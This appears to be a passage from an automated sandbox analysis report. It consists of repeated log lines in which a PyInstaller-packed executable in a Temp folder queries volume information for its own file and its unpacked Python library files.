                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_bz2.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_lzma.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\VCRUNTIME140.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_queue.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_sqlite3.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_socket.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\select.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\jaraco VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\jaraco VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_queue.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
